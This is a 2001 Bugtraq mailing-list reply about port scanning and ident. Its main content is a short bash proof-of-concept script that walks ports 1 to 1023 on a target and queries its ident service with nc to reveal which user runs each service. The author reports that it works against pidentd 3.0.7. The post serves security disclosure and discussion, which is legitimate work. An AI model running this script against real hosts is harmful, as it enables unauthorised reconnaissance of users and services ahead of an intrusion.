[18459] in bugtraq
Re: analysis of auditable port scanning techniques
daemon@ATHENA.MIT.EDU (Rainer Weikusat)
Mon Jan 8 13:11:36 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <87ae95102g.fsf@winter.inter-i.uni-mainz.de>
Date: Sat, 6 Jan 2001 10:50:31 +0100
Reply-To: Rainer Weikusat <weikusat@MAIL.UNI-MAINZ.DE>
From: Rainer Weikusat <weikusat@MAIL.UNI-MAINZ.DE>
X-To: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Dan Harkless's message of "Thu, 4 Jan 2001 20:32:01 -0800"
Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> writes:
> > Using this grammar applied to the data we send to an arbitrary host piped
> > to the ident/auth port will reveal the process owner running on a given
> > port, even though we initiated the connection.
>
> Uh, no. With properly-written ident daemons, such as pidentd,
-------------
#!/bin/bash
#
if [ "$1" != sub ];
then
export HOST=$(host $1 | awk '{ print $3; }')
declare -i I=1
export PPPID=$$
while [ $I -lt 1024 ];
do
(
export I
socket -r -p "$0 sub" $HOST $I 2>/dev/null
)
I=$(($I + 1))
done
else
LOCAL=$(netstat -n | grep ":.\+$HOST:$I.\+EST"|awk '{print $4;}'| cut -d: -f2)
echo "$I,$LOCAL" | nc -w 1 $HOST auth >/proc/$PPPID/fd/1
kill $PPID
fi
-------------
Just hacked up. Works wonderfully against pidentd 3.0.7-3 (Debian).
--
SIGSTOP
